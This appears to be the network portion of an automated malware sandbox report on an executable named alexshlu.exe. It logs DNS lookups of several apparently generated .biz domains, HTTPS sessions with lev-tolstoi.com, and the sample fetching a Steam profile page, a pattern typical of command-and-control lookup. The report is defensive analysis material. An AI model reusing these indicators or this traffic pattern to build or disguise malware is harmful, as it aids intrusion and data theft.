                                                                                                                                                                                                                                      Dec 18, 2024 12:08:08.583198071 CET49707443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:08.587018967 CET49707443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:08.587035894 CET44349707172.67.157.254192.168.2.8
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:08.587279081 CET44349707172.67.157.254192.168.2.8
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:08.588618040 CET49707443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:08.588648081 CET49707443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:08.588682890 CET44349707172.67.157.254192.168.2.8
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:11.606170893 CET44349707172.67.157.254192.168.2.8
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:11.606282949 CET44349707172.67.157.254192.168.2.8
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:11.606343031 CET49707443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:11.606651068 CET49707443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:11.606677055 CET44349707172.67.157.254192.168.2.8
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:11.606694937 CET49707443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:11.606702089 CET44349707172.67.157.254192.168.2.8
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:11.725709915 CET49708443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:11.725768089 CET44349708172.67.157.254192.168.2.8
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:11.725907087 CET49708443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:11.726401091 CET49708443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:11.726412058 CET44349708172.67.157.254192.168.2.8
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:12.934211016 CET44349708172.67.157.254192.168.2.8
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:12.934292078 CET49708443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:12.977649927 CET49708443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:12.977682114 CET44349708172.67.157.254192.168.2.8
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:12.978071928 CET44349708172.67.157.254192.168.2.8
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:12.987922907 CET49708443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:12.987951994 CET49708443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:12.988053083 CET44349708172.67.157.254192.168.2.8
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:16.629578114 CET44349708172.67.157.254192.168.2.8
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:16.629645109 CET44349708172.67.157.254192.168.2.8
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:16.629692078 CET44349708172.67.157.254192.168.2.8
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:16.629728079 CET49708443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:16.629740000 CET44349708172.67.157.254192.168.2.8
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:16.629755020 CET44349708172.67.157.254192.168.2.8
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:16.629854918 CET49708443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:16.629859924 CET44349708172.67.157.254192.168.2.8
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:16.629874945 CET44349708172.67.157.254192.168.2.8
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:16.629995108 CET49708443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:16.637738943 CET44349708172.67.157.254192.168.2.8
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:16.637803078 CET49708443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:16.642205954 CET44349708172.67.157.254192.168.2.8
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:16.642307043 CET44349708172.67.157.254192.168.2.8
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:16.643109083 CET49708443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:16.643141985 CET44349708172.67.157.254192.168.2.8
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:16.684020996 CET49708443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:16.750876904 CET44349708172.67.157.254192.168.2.8
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:16.793414116 CET49708443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:16.793443918 CET44349708172.67.157.254192.168.2.8
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:16.824086905 CET44349708172.67.157.254192.168.2.8
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:16.824139118 CET49708443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:16.824174881 CET44349708172.67.157.254192.168.2.8
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:16.824228048 CET44349708172.67.157.254192.168.2.8
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:16.824330091 CET44349708172.67.157.254192.168.2.8
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:16.824374914 CET49708443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:16.824539900 CET49708443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:16.824562073 CET44349708172.67.157.254192.168.2.8
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:16.824572086 CET49708443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:16.824578047 CET44349708172.67.157.254192.168.2.8
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:17.050815105 CET49709443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:17.050863981 CET44349709172.67.157.254192.168.2.8
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:17.051295042 CET49709443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:17.051295042 CET49709443192.168.2.8172.67.157.254
Timestamp                            Source Port  Dest Port  Source IP       Dest IP
Dec 18, 2024 12:08:17.051337957 CET  443          49709      172.67.157.254  192.168.2.8
Dec 18, 2024 12:08:18.263250113 CET  443          49709      172.67.157.254  192.168.2.8
Dec 18, 2024 12:08:18.263336897 CET  49709        443        192.168.2.8     172.67.157.254
Dec 18, 2024 12:08:18.264683962 CET  49709        443        192.168.2.8     172.67.157.254
Dec 18, 2024 12:08:18.264699936 CET  443          49709      172.67.157.254  192.168.2.8
Dec 18, 2024 12:08:18.264952898 CET  443          49709      172.67.157.254  192.168.2.8
Dec 18, 2024 12:08:18.266299963 CET  49709        443        192.168.2.8     172.67.157.254
Dec 18, 2024 12:08:18.266464949 CET  49709        443        192.168.2.8     172.67.157.254
Dec 18, 2024 12:08:18.266499996 CET  443          49709      172.67.157.254  192.168.2.8
Dec 18, 2024 12:08:20.477710962 CET  443          49709      172.67.157.254  192.168.2.8
Dec 18, 2024 12:08:20.477819920 CET  443          49709      172.67.157.254  192.168.2.8
Dec 18, 2024 12:08:20.477951050 CET  49709        443        192.168.2.8     172.67.157.254
Dec 18, 2024 12:08:20.477981091 CET  49709        443        192.168.2.8     172.67.157.254
Dec 18, 2024 12:08:20.627985954 CET  49712        443        192.168.2.8     172.67.157.254
Dec 18, 2024 12:08:20.628046989 CET  443          49712      172.67.157.254  192.168.2.8
Dec 18, 2024 12:08:20.628860950 CET  49712        443        192.168.2.8     172.67.157.254
Dec 18, 2024 12:08:20.629281998 CET  49712        443        192.168.2.8     172.67.157.254
Dec 18, 2024 12:08:20.629296064 CET  443          49712      172.67.157.254  192.168.2.8
Dec 18, 2024 12:08:21.852916956 CET  443          49712      172.67.157.254  192.168.2.8
Dec 18, 2024 12:08:21.853001118 CET  49712        443        192.168.2.8     172.67.157.254
Dec 18, 2024 12:08:21.854399920 CET  49712        443        192.168.2.8     172.67.157.254
Dec 18, 2024 12:08:21.854428053 CET  443          49712      172.67.157.254  192.168.2.8
Dec 18, 2024 12:08:21.854676008 CET  443          49712      172.67.157.254  192.168.2.8
Dec 18, 2024 12:08:21.856296062 CET  49712        443        192.168.2.8     172.67.157.254
Dec 18, 2024 12:08:21.856471062 CET  49712        443        192.168.2.8     172.67.157.254
Dec 18, 2024 12:08:21.856523037 CET  443          49712      172.67.157.254  192.168.2.8
Dec 18, 2024 12:08:21.856703997 CET  49712        443        192.168.2.8     172.67.157.254
Dec 18, 2024 12:08:21.899346113 CET  443          49712      172.67.157.254  192.168.2.8
Dec 18, 2024 12:08:24.675235033 CET  443          49712      172.67.157.254  192.168.2.8
Dec 18, 2024 12:08:24.675350904 CET  443          49712      172.67.157.254  192.168.2.8
Dec 18, 2024 12:08:24.675416946 CET  49712        443        192.168.2.8     172.67.157.254
Dec 18, 2024 12:08:24.675771952 CET  49712        443        192.168.2.8     172.67.157.254
Dec 18, 2024 12:08:24.675797939 CET  443          49712      172.67.157.254  192.168.2.8
Dec 18, 2024 12:08:24.951392889 CET  49713        443        192.168.2.8     172.67.157.254
Dec 18, 2024 12:08:24.951430082 CET  443          49713      172.67.157.254  192.168.2.8
Dec 18, 2024 12:08:24.951514006 CET  49713        443        192.168.2.8     172.67.157.254
Dec 18, 2024 12:08:24.951966047 CET  49713        443        192.168.2.8     172.67.157.254
Dec 18, 2024 12:08:24.951982021 CET  443          49713      172.67.157.254  192.168.2.8
Dec 18, 2024 12:08:26.165772915 CET  443          49713      172.67.157.254  192.168.2.8
Dec 18, 2024 12:08:26.165875912 CET  49713        443        192.168.2.8     172.67.157.254
Dec 18, 2024 12:08:26.167361975 CET  49713        443        192.168.2.8     172.67.157.254
Dec 18, 2024 12:08:26.167373896 CET  443          49713      172.67.157.254  192.168.2.8
Dec 18, 2024 12:08:26.167618036 CET  443          49713      172.67.157.254  192.168.2.8
Dec 18, 2024 12:08:26.169047117 CET  49713        443        192.168.2.8     172.67.157.254
Dec 18, 2024 12:08:26.169208050 CET  49713        443        192.168.2.8     172.67.157.254
Dec 18, 2024 12:08:26.169241905 CET  443          49713      172.67.157.254  192.168.2.8
Dec 18, 2024 12:08:26.169593096 CET  49713        443        192.168.2.8     172.67.157.254
Dec 18, 2024 12:08:26.169603109 CET  443          49713      172.67.157.254  192.168.2.8
Dec 18, 2024 12:08:30.533828020 CET  443          49713      172.67.157.254  192.168.2.8
Dec 18, 2024 12:08:30.533947945 CET  443          49713      172.67.157.254  192.168.2.8
Dec 18, 2024 12:08:30.534130096 CET  49713        443        192.168.2.8     172.67.157.254
Dec 18, 2024 12:08:30.534537077 CET  49713        443        192.168.2.8     172.67.157.254
Dec 18, 2024 12:08:31.005072117 CET  49714        443        192.168.2.8     172.67.157.254
Dec 18, 2024 12:08:31.005116940 CET  443          49714      172.67.157.254  192.168.2.8
Dec 18, 2024 12:08:31.005249977 CET  49714        443        192.168.2.8     172.67.157.254
Dec 18, 2024 12:08:31.005613089 CET  49714        443        192.168.2.8     172.67.157.254
Dec 18, 2024 12:08:31.005625010 CET  443          49714      172.67.157.254  192.168.2.8
Dec 18, 2024 12:08:32.212941885 CET  443          49714      172.67.157.254  192.168.2.8
Dec 18, 2024 12:08:32.213116884 CET  49714        443        192.168.2.8     172.67.157.254
Dec 18, 2024 12:08:32.214601994 CET  49714        443        192.168.2.8     172.67.157.254
Dec 18, 2024 12:08:32.214613914 CET  443          49714      172.67.157.254  192.168.2.8
Dec 18, 2024 12:08:32.214930058 CET  443          49714      172.67.157.254  192.168.2.8
Dec 18, 2024 12:08:32.216730118 CET  49714        443        192.168.2.8     172.67.157.254
Dec 18, 2024 12:08:32.216803074 CET  49714        443        192.168.2.8     172.67.157.254
Dec 18, 2024 12:08:32.216809988 CET  443          49714      172.67.157.254  192.168.2.8
Dec 18, 2024 12:08:32.964867115 CET  443          49714      172.67.157.254  192.168.2.8
Dec 18, 2024 12:08:32.964977026 CET  443          49714      172.67.157.254  192.168.2.8
Dec 18, 2024 12:08:32.965048075 CET  49714        443        192.168.2.8     172.67.157.254
Dec 18, 2024 12:08:32.965225935 CET  49714        443        192.168.2.8     172.67.157.254
Dec 18, 2024 12:08:32.965243101 CET  443          49714      172.67.157.254  192.168.2.8
Dec 18, 2024 12:08:33.535789967 CET  49715        443        192.168.2.8     172.67.157.254
Dec 18, 2024 12:08:33.535830975 CET  443          49715      172.67.157.254  192.168.2.8
Dec 18, 2024 12:08:33.536190987 CET  49715        443        192.168.2.8     172.67.157.254
Dec 18, 2024 12:08:33.536278009 CET  49715        443        192.168.2.8     172.67.157.254
Dec 18, 2024 12:08:33.536287069 CET  443          49715      172.67.157.254  192.168.2.8
Dec 18, 2024 12:08:34.744465113 CET  443          49715      172.67.157.254  192.168.2.8
Dec 18, 2024 12:08:34.746543884 CET  49715        443        192.168.2.8     172.67.157.254
Dec 18, 2024 12:08:34.746696949 CET  49715        443        192.168.2.8     172.67.157.254
Dec 18, 2024 12:08:34.746704102 CET  443          49715      172.67.157.254  192.168.2.8
Dec 18, 2024 12:08:34.746943951 CET  443          49715      172.67.157.254  192.168.2.8
Dec 18, 2024 12:08:34.748821020 CET  49715        443        192.168.2.8     172.67.157.254
Dec 18, 2024 12:08:34.750885010 CET  49715        443        192.168.2.8     172.67.157.254
Dec 18, 2024 12:08:34.750927925 CET  443          49715      172.67.157.254  192.168.2.8
Dec 18, 2024 12:08:34.751053095 CET  49715        443        192.168.2.8     172.67.157.254
Dec 18, 2024 12:08:34.751202106 CET  443          49715      172.67.157.254  192.168.2.8
Dec 18, 2024 12:08:34.751383066 CET  49715        443        192.168.2.8     172.67.157.254
Dec 18, 2024 12:08:34.751429081 CET  443          49715      172.67.157.254  192.168.2.8
Dec 18, 2024 12:08:34.751583099 CET  49715        443        192.168.2.8     172.67.157.254
Dec 18, 2024 12:08:34.751605988 CET  443          49715      172.67.157.254  192.168.2.8
Dec 18, 2024 12:08:34.751804113 CET  49715        443        192.168.2.8     172.67.157.254
Dec 18, 2024 12:08:34.751836061 CET  443          49715      172.67.157.254  192.168.2.8
Dec 18, 2024 12:08:34.751979113 CET  49715        443        192.168.2.8     172.67.157.254
Dec 18, 2024 12:08:34.752007961 CET  443          49715      172.67.157.254  192.168.2.8
Dec 18, 2024 12:08:34.752022028 CET  49715        443        192.168.2.8     172.67.157.254
Dec 18, 2024 12:08:34.752036095 CET  443          49715      172.67.157.254  192.168.2.8
Dec 18, 2024 12:08:34.752196074 CET  49715        443        192.168.2.8     172.67.157.254
Dec 18, 2024 12:08:34.752218962 CET  443          49715      172.67.157.254  192.168.2.8
Dec 18, 2024 12:08:34.752240896 CET  49715        443        192.168.2.8     172.67.157.254
Dec 18, 2024 12:08:34.752393961 CET  49715        443        192.168.2.8     172.67.157.254
Dec 18, 2024 12:08:34.752432108 CET  49715        443        192.168.2.8     172.67.157.254
Dec 18, 2024 12:08:34.799329042 CET  443          49715      172.67.157.254  192.168.2.8
Dec 18, 2024 12:08:34.799698114 CET  49715        443        192.168.2.8     172.67.157.254
Dec 18, 2024 12:08:34.799736977 CET  443          49715      172.67.157.254  192.168.2.8
Dec 18, 2024 12:08:34.799762964 CET  49715        443        192.168.2.8     172.67.157.254
Dec 18, 2024 12:08:34.799784899 CET  443          49715      172.67.157.254  192.168.2.8
Dec 18, 2024 12:08:34.799813032 CET  49715        443        192.168.2.8     172.67.157.254
Dec 18, 2024 12:08:34.799825907 CET  443          49715      172.67.157.254  192.168.2.8
Dec 18, 2024 12:08:34.801697016 CET  49715        443        192.168.2.8     172.67.157.254
Dec 18, 2024 12:08:34.801716089 CET  443          49715      172.67.157.254  192.168.2.8
Dec 18, 2024 12:08:39.425941944 CET  443          49715      172.67.157.254  192.168.2.8
Dec 18, 2024 12:08:39.426048040 CET  443          49715      172.67.157.254  192.168.2.8
Dec 18, 2024 12:08:39.426090956 CET  49715        443        192.168.2.8     172.67.157.254
Dec 18, 2024 12:08:39.426309109 CET  49715        443        192.168.2.8     172.67.157.254
Dec 18, 2024 12:08:39.426330090 CET  443          49715      172.67.157.254  192.168.2.8
Dec 18, 2024 12:08:39.483972073 CET  49716        443        192.168.2.8     172.67.157.254
Dec 18, 2024 12:08:39.484020948 CET  443          49716      172.67.157.254  192.168.2.8
Dec 18, 2024 12:08:39.484082937 CET  49716        443        192.168.2.8     172.67.157.254
Dec 18, 2024 12:08:39.484813929 CET  49716        443        192.168.2.8     172.67.157.254
Dec 18, 2024 12:08:39.484831095 CET  443          49716      172.67.157.254  192.168.2.8
Dec 18, 2024 12:08:40.694865942 CET  443          49716      172.67.157.254  192.168.2.8
Dec 18, 2024 12:08:40.694941998 CET  49716        443        192.168.2.8     172.67.157.254
Dec 18, 2024 12:08:40.696257114 CET  49716        443        192.168.2.8     172.67.157.254
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:40.696273088 CET44349716172.67.157.254192.168.2.8
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:40.696537018 CET44349716172.67.157.254192.168.2.8
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:40.697835922 CET49716443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:40.697864056 CET49716443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:40.697922945 CET44349716172.67.157.254192.168.2.8
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:41.408673048 CET44349716172.67.157.254192.168.2.8
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:41.408768892 CET44349716172.67.157.254192.168.2.8
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:41.408883095 CET49716443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:41.409162045 CET49716443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                      Dec 18, 2024 12:08:41.409189939 CET44349716172.67.157.254192.168.2.8
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 18, 2024 12:08:01.756994009 CET | 57712 | 53 | 192.168.2.8 | 1.1.1.1
Dec 18, 2024 12:08:01.977881908 CET | 53 | 57712 | 1.1.1.1 | 192.168.2.8
Dec 18, 2024 12:08:01.982893944 CET | 56041 | 53 | 192.168.2.8 | 1.1.1.1
Dec 18, 2024 12:08:02.217930079 CET | 53 | 56041 | 1.1.1.1 | 192.168.2.8
Dec 18, 2024 12:08:02.221141100 CET | 65295 | 53 | 192.168.2.8 | 1.1.1.1
Dec 18, 2024 12:08:02.448421955 CET | 53 | 65295 | 1.1.1.1 | 192.168.2.8
Dec 18, 2024 12:08:02.451320887 CET | 63332 | 53 | 192.168.2.8 | 1.1.1.1
Dec 18, 2024 12:08:02.668807030 CET | 53 | 63332 | 1.1.1.1 | 192.168.2.8
Dec 18, 2024 12:08:02.688843012 CET | 49948 | 53 | 192.168.2.8 | 1.1.1.1
Dec 18, 2024 12:08:02.910460949 CET | 53 | 49948 | 1.1.1.1 | 192.168.2.8
Dec 18, 2024 12:08:02.913399935 CET | 58758 | 53 | 192.168.2.8 | 1.1.1.1
Dec 18, 2024 12:08:03.144762993 CET | 53 | 58758 | 1.1.1.1 | 192.168.2.8
Dec 18, 2024 12:08:03.147869110 CET | 51738 | 53 | 192.168.2.8 | 1.1.1.1
Dec 18, 2024 12:08:03.383033991 CET | 53 | 51738 | 1.1.1.1 | 192.168.2.8
Dec 18, 2024 12:08:03.390182972 CET | 60764 | 53 | 192.168.2.8 | 1.1.1.1
Dec 18, 2024 12:08:03.612596035 CET | 53 | 60764 | 1.1.1.1 | 192.168.2.8
Dec 18, 2024 12:08:03.701371908 CET | 63719 | 53 | 192.168.2.8 | 1.1.1.1
Dec 18, 2024 12:08:03.915025949 CET | 53 | 63719 | 1.1.1.1 | 192.168.2.8
Dec 18, 2024 12:08:03.921665907 CET | 58067 | 53 | 192.168.2.8 | 1.1.1.1
Dec 18, 2024 12:08:04.059670925 CET | 53 | 58067 | 1.1.1.1 | 192.168.2.8
Dec 18, 2024 12:08:07.115183115 CET | 65399 | 53 | 192.168.2.8 | 1.1.1.1
Dec 18, 2024 12:08:07.365803957 CET | 53 | 65399 | 1.1.1.1 | 192.168.2.8
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 18, 2024 12:08:01.756994009 CET | 192.168.2.8 | 1.1.1.1 | 0xc2f4 | Standard query (0) | drive-connect.cyou | A (IP address) | IN (0x0001) | false
Dec 18, 2024 12:08:01.982893944 CET | 192.168.2.8 | 1.1.1.1 | 0xfc05 | Standard query (0) | se-blurry.biz | A (IP address) | IN (0x0001) | false
Dec 18, 2024 12:08:02.221141100 CET | 192.168.2.8 | 1.1.1.1 | 0xa56f | Standard query (0) | zinc-sneark.biz | A (IP address) | IN (0x0001) | false
Dec 18, 2024 12:08:02.451320887 CET | 192.168.2.8 | 1.1.1.1 | 0xadc9 | Standard query (0) | dwell-exclaim.biz | A (IP address) | IN (0x0001) | false
Dec 18, 2024 12:08:02.688843012 CET | 192.168.2.8 | 1.1.1.1 | 0x31f6 | Standard query (0) | formy-spill.biz | A (IP address) | IN (0x0001) | false
Dec 18, 2024 12:08:02.913399935 CET | 192.168.2.8 | 1.1.1.1 | 0xef00 | Standard query (0) | covery-mover.biz | A (IP address) | IN (0x0001) | false
Dec 18, 2024 12:08:03.147869110 CET | 192.168.2.8 | 1.1.1.1 | 0x5ed9 | Standard query (0) | dare-curbys.biz | A (IP address) | IN (0x0001) | false
Dec 18, 2024 12:08:03.390182972 CET | 192.168.2.8 | 1.1.1.1 | 0x1a54 | Standard query (0) | print-vexer.biz | A (IP address) | IN (0x0001) | false
Dec 18, 2024 12:08:03.701371908 CET | 192.168.2.8 | 1.1.1.1 | 0x23ac | Standard query (0) | impend-differ.biz | A (IP address) | IN (0x0001) | false
Dec 18, 2024 12:08:03.921665907 CET | 192.168.2.8 | 1.1.1.1 | 0x4bd | Standard query (0) | steamcommunity.com | A (IP address) | IN (0x0001) | false
Dec 18, 2024 12:08:07.115183115 CET | 192.168.2.8 | 1.1.1.1 | 0x9535 | Standard query (0) | lev-tolstoi.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 18, 2024 12:08:01.977881908 CET | 1.1.1.1 | 192.168.2.8 | 0xc2f4 | Name error (3) | drive-connect.cyou | none | none | A (IP address) | IN (0x0001) | false
Dec 18, 2024 12:08:02.217930079 CET | 1.1.1.1 | 192.168.2.8 | 0xfc05 | Name error (3) | se-blurry.biz | none | none | A (IP address) | IN (0x0001) | false
Dec 18, 2024 12:08:02.448421955 CET | 1.1.1.1 | 192.168.2.8 | 0xa56f | Name error (3) | zinc-sneark.biz | none | none | A (IP address) | IN (0x0001) | false
Dec 18, 2024 12:08:02.668807030 CET | 1.1.1.1 | 192.168.2.8 | 0xadc9 | Name error (3) | dwell-exclaim.biz | none | none | A (IP address) | IN (0x0001) | false
Dec 18, 2024 12:08:02.910460949 CET | 1.1.1.1 | 192.168.2.8 | 0x31f6 | Name error (3) | formy-spill.biz | none | none | A (IP address) | IN (0x0001) | false
Dec 18, 2024 12:08:03.144762993 CET | 1.1.1.1 | 192.168.2.8 | 0xef00 | Name error (3) | covery-mover.biz | none | none | A (IP address) | IN (0x0001) | false
Dec 18, 2024 12:08:03.383033991 CET | 1.1.1.1 | 192.168.2.8 | 0x5ed9 | Name error (3) | dare-curbys.biz | none | none | A (IP address) | IN (0x0001) | false
Dec 18, 2024 12:08:03.612596035 CET | 1.1.1.1 | 192.168.2.8 | 0x1a54 | Name error (3) | print-vexer.biz | none | none | A (IP address) | IN (0x0001) | false
Dec 18, 2024 12:08:03.915025949 CET | 1.1.1.1 | 192.168.2.8 | 0x23ac | Name error (3) | impend-differ.biz | none | none | A (IP address) | IN (0x0001) | false
Dec 18, 2024 12:08:04.059670925 CET | 1.1.1.1 | 192.168.2.8 | 0x4bd | No error (0) | steamcommunity.com |  | 23.55.153.106 | A (IP address) | IN (0x0001) | false
Dec 18, 2024 12:08:07.365803957 CET | 1.1.1.1 | 192.168.2.8 | 0x9535 | No error (0) | lev-tolstoi.com |  | 172.67.157.254 | A (IP address) | IN (0x0001) | false
Dec 18, 2024 12:08:07.365803957 CET | 1.1.1.1 | 192.168.2.8 | 0x9535 | No error (0) | lev-tolstoi.com |  | 104.21.66.86 | A (IP address) | IN (0x0001) | false
• steamcommunity.com
• lev-tolstoi.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.8 | 49706 | 23.55.153.106 | 443 | 7720 | C:\Users\user\Desktop\alexshlu.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-18 11:08:05 UTC | 219 | OUT | GET /profiles/76561199724331900 HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Host: steamcommunity.com
2024-12-18 11:08:06 UTC | 1905 | IN | HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=UTF-8
Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache
Date: Wed, 18 Dec 2024 11:08:05 GMT
Content-Length: 35121
Connection: close
Set-Cookie: sessionid=8a0582c0d1571303a7d0d81f; Path=/; Secure; SameSite=None
Set-Cookie: steamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=None
2024-12-18 11:08:06 UTC | 14479 | IN | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0a 09 09 3c 74 69 74 6c 65 3e
Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><title>
2024-12-18 11:08:06 UTC | 10097 | IN | Data Raw: 2e 63 6f 6d 2f 3f 73 75 62 73 65 63 74 69 6f 6e 3d 62 72 6f 61 64 63 61 73 74 73 22 3e 0a 09 09 09 09 09 09 42 72 6f 61 64 63 61 73 74 73 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 61 62 6f 75 74 2f 22 3e 0a 09 09 09 09 41 62 6f 75 74 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 65 6c 70 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 65 6e 2f 22 3e 0a 09 09 09 09 53 55 50 50 4f 52 54 09
